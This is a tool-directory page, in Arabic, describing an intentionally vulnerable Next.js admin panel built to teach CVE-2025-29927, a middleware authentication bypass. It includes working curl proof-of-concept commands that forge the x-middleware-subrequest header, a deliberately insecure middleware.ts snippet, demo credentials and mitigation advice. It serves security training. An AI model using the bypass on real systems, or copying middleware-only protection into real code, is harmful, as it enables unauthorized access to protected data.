Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-29927-nextjs — عرض تعليمي لـ CVE-2025-29927، وهو تجاوز خطير لمصادقة الوسيطة في Next.js. يتضمن لوحة تحكم ضعيفة، وأوامر إثبات المفهوم للاستغلال، وإرشادات التخفيف للتدريب على الأمن السيبراني. | Kitploit
أدوات/GitHubGitHub/gitgudkrish/cve-2025-29927-nextjs
تحليل الثغرات الأمنيةاستغلال تطبيقات الويبأمن الويباختبار الاختراقالمصادقةالتعلم والتعليم
GitHubgitgudkrish/cve-2025-29927-nextjs

cve-2025-29927-nextjs

عرض تعليمي لـ CVE-2025-29927، وهو تجاوز خطير لمصادقة الوسيطة في Next.js. يتضمن لوحة تحكم ضعيفة، وأوامر إثبات المفهوم للاستغلال، وإرشادات التخفيف للتدريب على الأمن السيبراني.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

لوحة إدارة Himalaya Tech — عرض CVE-2025-29927

تحذير: هذا التطبيق ضعيف بشكل متعمد. للأغراض التعليمية وأبحاث الأمن المصرح بها فقط. لا تقم بنشره على خادم عام.


حول هذا العرض التوضيحي

يُظهر هذا التطبيق CVE-2025-29927، وهي ثغرة خطيرة لتجاوز المصادقة في برمجية Next.js الوسيطة (CVSS 9.1). يحاكي التطبيق لوحة إدارة مؤسسية واقعية للشركة الخيالية "Himalaya Tech Pvt. Ltd." مما يجعل تأثير التجاوز مقنعاً بصرياً.

جميع سجلات الموظفين ومفاتيح API وبيانات اعتماد قاعدة البيانات والبيانات "الحساسة" الأخرى المعروضة هي خيالية ومحاكاة بالكامل — تم إنشاؤها لأغراض العرض التوضيحي التعليمي فقط.


CVE-2025-29927 — ملخص الثغرة

الحقلالتفاصيل
CVE IDCVE-2025-29927
الشدةحرجة (CVSS 9.1)
المتأثرNext.js ≤ 14.2.29, Next.js ≤ 15.2.2
تم الإصلاح فيNext.js 14.2.30, 15.2.3
النوعتجاوز المصادقة في الوسيطة عبر التلاعب برأس HTTP

السبب الجذري

تستخدم Next.js رأس HTTP داخلي x-middleware-subrequest لتتبع استدعاءات الوسيطة المتكررة ومنع الحلقات اللانهائية. في الإصدارات الضعيفة، يمكن للمهاجم تزوير هذا الرأس في طلب خارجي. عندما يكون الرأس موجوداً ويتطابق مع معرف الوسيطة، فإن بيئة تشغيل Next.js تتخطى الوسيطة بالكامل، بما في ذلك كل منطق المصادقة المحدد داخلها.

التأثير

أي تطبيق يعتمد فقط على middleware.ts لحماية المسارات (وهو نمط شائع وموصى به في Next.js) يكون عرضة للخطر. يمكن للمهاجم غير المصادق الوصول إلى أي صفحة محمية بمجرد إضافة رأس HTTP واحد.


إثبات المفهوم

طلب عادي (محظور — إعادة توجيه إلى /login)

root@kitploit:~
curl -v http://localhost:3000/admin
# → 307 Redirect to /login

طلب تجاوز (ينجح — يعيد صفحة الإدارة الكاملة)

root@kitploit:~
curl -v \
  -H "x-middleware-subrequest: middleware" \
  http://localhost:3000/admin

# → 200 OK — full admin dashboard HTML returned, no authentication required

الوصول إلى المسارات المحمية المتداخلة

root@kitploit:~
# Admin users page
curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin/users

# System settings with "production credentials"
curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin/settings

باستخدام متصفح (عبر Burp Suite / إضافة متصفح)

أضف رأس الطلب x-middleware-subrequest: middleware إلى أي طلب إلى /admin/* وسيتم تخطي فحص الوسيطة.


لماذا هذا التطبيق ضعيف

middleware.ts هو آلية الحماية الوحيدة:

root@kitploit:~
// middleware.ts
export function middleware(request: NextRequest) {
  if (pathname.startsWith("/admin")) {
    const token = request.cookies.get("auth-token")?.value;
    if (!token || token !== "valid-session-xyz123") {
      return NextResponse.redirect(loginUrl); // ← this entire function is skipped
    }
  }
  return NextResponse.next();
}

مكونات الصفحة نفسها (مثل app/admin/page.tsx) لا تحتوي على فحوصات مصادقة — عن قصد، لتعكس التطبيقات الواقعية التي تتبع نمط الحماية بالوسيطة فقط.


الإعداد والتشغيل

المتطلبات الأساسية

  • Node.js 18+
  • npm أو yarn

التثبيت

root@kitploit:~
npm install

تشغيل خادم التطوير

root@kitploit:~
npm run dev

سيكون التطبيق متاحاً على http://localhost:3000.

المسارات

*محمية بالوسيطة فقط — يتم تجاوزها بواسطة CVE-2025-29927.

بيانات اعتماد العرض التوضيحي (تدفق تسجيل الدخول العادي)

  • البريد الإلكتروني: [email protected]
  • كلمة المرور: Admin@2024

التخفيف

  1. قم بترقية Next.js إلى 14.2.30+ أو 15.2.3+.
  2. الدفاع المتعمق: أضف فحوصات مصادقة من جانب الخادم داخل مكونات الصفحة/معالجات المسار، وليس فقط في الوسيطة. يجب التعامل مع الوسيطة كتحسين لتجربة المستخدم، وليس كحد أمني.
  3. قم بإزالة الرأس في الوكيل العكسي/CDN الخاص بك قبل وصول الطلبات إلى Next.js.

إخلاء مسؤولية

يتم توفير هذا التطبيق للأغراض التعليمية فقط، وبالتحديد لعرض التأثير الواقعي لـ CVE-2025-29927 في سياق دورة أمن أخلاقي. جميع البيانات (سجلات الموظفين، مفاتيح API، بيانات الاعتماد) هي خيالية بالكامل. لا تستخدم هذا التطبيق التوضيحي أو التقنيات الموضحة هنا ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.

تنزيل الأداة
المسارمصادقة مطلوبةالوصف
/لاصفحة هبوط عامة
/loginلانموذج تسجيل الدخول
/adminنعم*لوحة إدارة مع بيانات حساسة
/admin/usersنعم*إدارة المستخدمين
/admin/settingsنعم*إعدادات النظام وبيانات الاعتماد